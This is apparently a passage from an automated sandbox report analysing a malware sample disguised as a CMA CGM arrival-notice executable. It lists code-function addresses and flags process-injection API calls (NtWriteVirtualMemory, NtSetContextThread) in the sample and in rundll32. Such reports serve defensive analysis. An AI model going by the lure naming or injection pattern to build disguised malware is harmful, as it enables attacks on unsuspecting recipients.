      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780C2A0_2_00780C2A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791C1C0_2_00791C1C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782C100_2_00782C10
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790C150_2_00790C15
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782CED0_2_00782CED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791CD90_2_00791CD9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780CD00_2_00780CD0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788CB80_2_00788CB8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789CA00_2_00789CA0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782C880_2_00782C88
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BD690_2_0078BD69
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791D610_2_00791D61
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780D5C0_2_00780D5C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789D490_2_00789D49
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788D400_2_00788D40
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790D440_2_00790D44
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780D2C0_2_00780D2C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078DD100_2_0078DD10
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BDFC0_2_0078BDFC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791DCB0_2_00791DCB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789DCC0_2_00789DCC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790DB10_2_00790DB1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788DAD0_2_00788DAD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00792E7A0_2_00792E7A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E690_2_00789E69
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BE340_2_0078BE34
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788E290_2_00788E29
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790E210_2_00790E21
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E000_2_00789E00
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790EF80_2_00790EF8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00784EBB0_2_00784EBB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BEBC0_2_0078BEBC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781EA80_2_00781EA8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785EAC0_2_00785EAC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788EA00_2_00788EA0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790E850_2_00790E85
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F7D0_2_00788F7D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781F6C0_2_00781F6C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BF610_2_0078BF61
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789F540_2_00789F54
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BF4B0_2_0078BF4B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785F4D0_2_00785F4D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781F100_2_00781F10
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F110_2_00788F11
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BF010_2_0078BF01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781FFC0_2_00781FFC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FF40_2_00789FF4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785FE40_2_00785FE4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00786FA90_2_00786FA9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FAA0_2_00789FAA
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E626E3012_2_1E626E30
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63EBB012_2_1E63EBB0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C100212_2_1E6C1002
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61841F12_2_1E61841F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61B09012_2_1E61B090
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D1D5512_2_1E6D1D55
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E600D2012_2_1E600D20
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62412012_2_1E624120
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60F90012_2_1E60F900
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61D5E012_2_1E61D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487B09014_2_0487B090
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0492100214_2_04921002
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487841F14_2_0487841F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487D5E014_2_0487D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486F90014_2_0486F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04860D2014_2_04860D20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488412014_2_04884120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04931D5514_2_04931D55
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04886E3014_2_04886E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489EBB014_2_0489EBB0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00802D8814_2_00802D88
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00802D9014_2_00802D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00809E3014_2_00809E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CF9314_2_0081CF93
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CF9614_2_0081CF96
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00802FB014_2_00802FB0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: String function: 1E60B150 appears 32 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0486B150 appears 32 times
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078F4F6 NtWriteVirtualMemory,LoadLibraryA,0_2_0078F4F6
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B52A NtAllocateVirtualMemory,0_2_0078B52A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00793504 LoadLibraryA,NtSetContextThread,0_2_00793504
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875D7 NtWriteVirtualMemory,LoadLibraryA,0_2_007875D7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A83B NtWriteVirtualMemory,LoadLibraryA,0_2_0078A83B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00792D4E NtProtectVirtualMemory,0_2_00792D4E
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078907D NtWriteVirtualMemory,0_2_0078907D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A058 NtWriteVirtualMemory,0_2_0078A058
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A03A NtWriteVirtualMemory,0_2_0078A03A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A0D4 NtWriteVirtualMemory,0_2_0078A0D4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .e